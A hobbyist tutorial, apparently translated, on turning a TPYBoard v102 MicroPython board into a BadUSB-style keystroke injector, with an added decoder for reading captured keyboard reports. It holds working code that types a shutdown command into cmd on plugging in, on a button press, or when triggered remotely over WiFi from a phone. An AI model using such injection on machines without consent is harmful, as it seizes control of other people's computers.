This article uses the TPYBoard v102 development board as an example to explain the main method of testing a BadUSB-style USB HID device with MicroPython, and uses an MT7681 module for a simple experiment that turns a phone into a remote keyboard.

I recently picked up a TPYBoard V102 online (official site: www.micropython.net.cn) and had a closer look at it, in particular at its built-in USB-HID function. The pleasant surprise is that you can test HID attack techniques knowing nothing but Python. For details on using the TPYBoard v102, see www.micropython.net.cn.

TPYBoard V102 keyboard emulation

Getting started with the board is skipped in this article; if you are interested, see http://www.micropython.net.cn/support_category.php?id=2. When the TPYBoard v102 emulates a keyboard, every report it sends is 8 bytes long; once you understand what those 8 bytes mean, you can emulate any HID keyboard input.

The 8 bytes the keyboard sends are BYTE1 BYTE2 BYTE3 BYTE4 BYTE5 BYTE6 BYTE7 BYTE8. BYTE1 carries the modifier keys, one bit per key (a bit is 1 while that key is held down):

BYTE1
|--bit0: Left Control
|--bit1: Left Shift
|--bit2: Left Alt
|--bit3: Left GUI
|--bit4: Right Control
|--bit5: Right Shift
|--bit6: Right Alt
|--bit7: Right GUI

BYTE3 to BYTE8 hold the key codes themselves (see the key table in the appendix). For example, pressing Left Shift + a sends 0x02,0x00,0x04,0x00,0x00,0x00,0x00,0x00.

The following walks through pressing Left GUI + R step by step.

Step 1: edit boot.py as follows:

    import machine
    import pyb
    #pyb.main('main.py') # main script to run after this one
    #pyb.usb_mode('CDC+MSC') # act as a serial and a storage device
    pyb.usb_mode('CDC+HID', hid=pyb.hid_keyboard) # act as a serial device and a USB keyboard
Step 2: edit main.py as follows:

    # main.py -- put your code here!
    import pyb

    hid = pyb.USB_HID()

    def release_key_once():
        buf = bytearray(8) # report is 8 bytes long
        buf[2] = 0
        hid.send(buf) # key released
        pyb.delay(10)

    def press_key_once(key):
        buf = bytearray(8) # report is 8 bytes long
        buf[2] = key
        hid.send(buf) # key pressed
        pyb.delay(10)

    def press_2key(key1, key2):
        buf = bytearray(8) # report is 8 bytes long
        buf[0] = key1 # modifier bits
        buf[2] = key2
        hid.send(buf) # modifier + key pressed
        pyb.delay(10)

    def release_2key():
        buf = bytearray(8) # report is 8 bytes long
        buf[0] = 0
        buf[2] = 0
        hid.send(buf) # all keys released
        pyb.delay(10)

    pyb.delay(1000) # wait 1 second before typing
    press_2key(0x08, 0x15) # Left GUI + r; key values are listed in the appendix
    release_2key()

Step 3: safely remove the TPYBoard v102, then press the RST button once; after one second you will see the "Run" dialog pop up.
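As an added example (not code from the original post or the TPYBoard project), here is a Python decoder for the 8-byte report format described above: it turns a captured sequence of reports back into the text the host received, which is how you would check, from a USB capture, what an unknown "keyboard" actually typed. The embedded key table covers only letters, digits, Enter, space and minus; the helper `tap` and the constructed `RUN_BOX` capture are assumptions made for the demonstration.

```python
# Added example, not from the original post: decode the 8-byte HID keyboard
# report described above (byte 0 = modifier bits, byte 1 reserved, bytes 2..7
# = up to six key codes) back into text, e.g. to read what an unknown
# "keyboard" typed from a USB capture. Codes are standard HID usage IDs.

MODIFIERS = ["LCtrl", "LShift", "LAlt", "LGUI", "RCtrl", "RShift", "RAlt", "RGUI"]

# usage id -> (unshifted, shifted): letters, digits and the keys the post uses
KEYS = {0x28: ("\n", "\n"), 0x2c: (" ", " "), 0x2d: ("-", "_")}
for i, c in enumerate("abcdefghijklmnopqrstuvwxyz"):
    KEYS[0x04 + i] = (c, c.upper())
for i, c in enumerate("1234567890"):
    KEYS[0x1e + i] = (c, "!@#$%^&*()"[i])

def decode_report(report):
    """Split one 8-byte report into (modifier names, non-zero key codes)."""
    if len(report) != 8:
        raise ValueError("boot-protocol keyboard report must be 8 bytes")
    mods = [n for bit, n in enumerate(MODIFIERS) if report[0] & (1 << bit)]
    return mods, [k for k in report[2:8] if k]

def reconstruct(reports):
    """Return the text a host would see for a sequence of reports.

    A key counts once, when it first appears (key-down); repeating a held key
    adds nothing, as on a real host. Shift picks the shifted character; other
    modifiers are rendered as <LGUI+r> tokens so shortcuts stay visible."""
    out, held = [], set()
    for rep in reports:
        mods, keys = decode_report(rep)
        shifted = any(m.endswith("Shift") for m in mods)
        combo = [m for m in mods if not m.endswith("Shift")]
        for k in keys:
            if k not in held:
                ch = KEYS.get(k, ("<0x%02x>" % k,) * 2)[1 if shifted else 0]
                out.append("<%s>" % "+".join(combo + [ch]) if combo else ch)
        held = set(keys)
    return "".join(out)

def tap(code, modifier=0):
    """Constructed sample input: one press report followed by a release."""
    return [bytes([modifier, 0, code, 0, 0, 0, 0, 0]), bytes(8)]

# constructed capture mirroring the post: Left GUI + r, then "cmd" + Enter
RUN_BOX = tap(0x15, 0x08) + tap(0x06) + tap(0x10) + tap(0x07) + tap(0x28)
print(repr(reconstruct(RUN_BOX)))  # '<LGUI+r>cmd\n'
```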
0x03 A simple HID test

This test opens the "Run" dialog, types cmd, and once the cmd window appears types shutdown -s -t 60, which shuts the PC down after 60 seconds.

The code of main.py is as follows:
    # main.py -- put your code here!
    import pyb

    hid = pyb.USB_HID()

    def release_key_once():
        buf = bytearray(8) # report is 8 bytes long
        buf[2] = 0
        hid.send(buf) # key released
        pyb.delay(10)

    def press_key_once(key):
        buf = bytearray(8) # report is 8 bytes long
        buf[2] = key
        hid.send(buf) # key pressed
        pyb.delay(10)

    def press_2key(key1, key2):
        buf = bytearray(8) # report is 8 bytes long
        buf[0] = key1 # modifier bits
        buf[2] = key2
        hid.send(buf) # modifier + key pressed
        pyb.delay(10)

    def release_2key():
        buf = bytearray(8) # report is 8 bytes long
        buf[0] = 0
        buf[2] = 0
        hid.send(buf) # all keys released
        pyb.delay(10)

    pyb.delay(1000) # wait 1 second before typing
    press_2key(0x08, 0x15) # Left GUI + r; key values are listed in the appendix
    release_2key()
    pyb.delay(100)
    a = [0x06, 0x10, 0x07, 0x28] # cmd + Enter
    for i in a:
        press_key_once(i)
        release_key_once()
    pyb.delay(1000)
    # shutdown -s -t 60 + Enter
    a = [0x16, 0x0b, 0x18, 0x17, 0x07, 0x12, 0x1a, 0x11, 0x2c, 0x2d, 0x16, 0x2c, 0x2d, 0x17, 0x2c, 0x23, 0x27, 0x28]
    for i in a:
        press_key_once(i)
        release_key_once()
    pyb.delay(1000)
What the program does: when the board is plugged into a PC, the "Run" dialog pops up first, cmd is typed into it, the cmd window opens, shutdown -s -t 60 followed by Enter is typed into it, and the PC shuts down one minute later.

DIY one-button shutdown

The TPYBoard v102 has a usr button, which can be used to build a one-button shutdown. Once the program is running, pressing the usr button raises an interrupt, LED3 blinks once, and the shutdown sequence is sent. The code is as follows:

    # main.py -- put your code here!
    import pyb

    FLAG = 0 # flag: when set to 1, send the shutdown sequence

    def release_key_once():
        buf = bytearray(8) # report is 8 bytes long
        buf[2] = 0
        hid.send(buf) # key released
        pyb.delay(10)

    def press_key_once(key):
        buf = bytearray(8) # report is 8 bytes long
        buf[2] = key
        hid.send(buf) # key pressed
        pyb.delay(10)

    def press_2key(key1, key2):
        buf = bytearray(8) # report is 8 bytes long
        buf[0] = key1 # modifier bits
        buf[2] = key2
        hid.send(buf) # modifier + key pressed
        pyb.delay(10)

    def release_2key():
        buf = bytearray(8) # report is 8 bytes long
        buf[0] = 0
        buf[2] = 0
        hid.send(buf) # all keys released
        pyb.delay(10)

    def shutdownpc(): # usr button interrupt callback: blink LED3 and set the flag
        global FLAG
        pyb.LED(3).on()
        FLAG = 1
        pyb.delay(300)
        pyb.LED(3).off()

    hid = pyb.USB_HID()
    sw = pyb.Switch()
    sw.callback(shutdownpc)

    while(1): # LED2 blinking shows the board is running normally
        pyb.LED(2).toggle()
        pyb.delay(300)
        print(FLAG) # debug output on the serial console
        if FLAG == 1:
            pyb.delay(1000) # wait 1 second before typing
            press_2key(0x08, 0x15) # Left GUI + r; key values are listed in the appendix
            release_2key()
            pyb.delay(100)
            a = [0x06, 0x10, 0x07, 0x28] # cmd + Enter
            for i in a:
                press_key_once(i)
                release_key_once()
            pyb.delay(1000)
            # shutdown -s -t 60 + Enter
            a = [0x16, 0x0b, 0x18, 0x17, 0x07, 0x12, 0x1a, 0x11, 0x2c, 0x2d, 0x16, 0x2c, 0x2d, 0x17, 0x2c, 0x23, 0x27, 0x28]
            for i in a:
                press_key_once(i)
                release_key_once()
            pyb.delay(1000)
            FLAG = 0
Typing on the keyboard from a phone

For this experiment I used an MT7681 WiFi module, which can pass serial data straight through (transparent serial bridge). Connect the MT7681 to the TPYBoard v102 as shown in the wiring diagram below. UART3 of the TPYBoard v102 is used here, at 115200 baud. The code is as follows:

    # main.py -- put your code here!
    import pyb

    FLAG = 0 # 1: send the shutdown sequence, 2: open notepad

    def release_key_once():
        buf = bytearray(8) # report is 8 bytes long
        buf[2] = 0
        hid.send(buf) # key released
        pyb.delay(10)

    def press_key_once(key):
        buf = bytearray(8) # report is 8 bytes long
        buf[2] = key
        hid.send(buf) # key pressed
        pyb.delay(10)

    def press_2key(key1, key2):
        buf = bytearray(8) # report is 8 bytes long
        buf[0] = key1 # modifier bits
        buf[2] = key2
        hid.send(buf) # modifier + key pressed
        pyb.delay(10)

    def release_2key():
        buf = bytearray(8) # report is 8 bytes long
        buf[0] = 0
        buf[2] = 0
        hid.send(buf) # all keys released
        pyb.delay(10)

    def shutdownpc(): # usr button interrupt callback
        global FLAG
        pyb.LED(3).on()
        FLAG = 1
        pyb.delay(1000)
        pyb.LED(3).off()

    def getchars(): # called when the phone sends 's' over the serial link
        global FLAG
        pyb.LED(3).on()
        FLAG = 2
        pyb.delay(1000)
        pyb.LED(3).off()

    hid = pyb.USB_HID()
    sw = pyb.Switch()
    sw.callback(shutdownpc)
    u1 = pyb.UART(3, 115200)
    u1.init(115200, bits=8, parity=None, stop=1)
    u1.write('Hello world!')
    buf = ''
    #print(buf)

    while(1): # LED2 blinking shows the board is running normally
        buf = u1.readline() # None if nothing arrived before the timeout
        print(buf)
        if buf == b's':
            getchars()
        pyb.LED(2).toggle()
        pyb.delay(1300)
        print(FLAG) # debug output on the serial console
        if FLAG == 1:
            pyb.delay(1000) # wait 1 second before typing
            press_2key(0x08, 0x15) # Left GUI + r; key values are listed in the appendix
            release_2key()
            pyb.delay(100)
            a = [0x06, 0x10, 0x07, 0x28] # cmd + Enter
            for i in a:
                press_key_once(i)
                release_key_once()
            pyb.delay(1000)
            # shutdown -s -t 60 + Enter
            a = [0x16, 0x0b, 0x18, 0x17, 0x07, 0x12, 0x1a, 0x11, 0x2c, 0x2d, 0x16, 0x2c, 0x2d, 0x17, 0x2c, 0x23, 0x27, 0x28]
            for i in a:
                press_key_once(i)
                release_key_once()
            pyb.delay(1000)
            FLAG = 0
        if FLAG == 2:
            pyb.delay(1000) # wait 1 second before typing
            press_2key(0x08, 0x15) # Left GUI + r; key values are listed in the appendix
            release_2key()
            pyb.delay(100)
            a = [0x11, 0x12, 0x17, 0x08, 0x13, 0x04, 0x07, 0x28] # notepad + Enter
            for i in a:
                press_key_once(i)
                release_key_once()
            pyb.delay(1000)
            FLAG = 0
At this point you can see that the phone behaves like a remote keyboard and drives the PC's keyboard directly. With a little more work on the program you could build a rather nice phone keyboard. And since data can also be returned over the serial port, you could write a host-side program on the PC that sends the results of PC operations back. Further extensions are left to the reader; that is all for now.

Video demo:

Appendix: the main MicroPython key codes are as follows: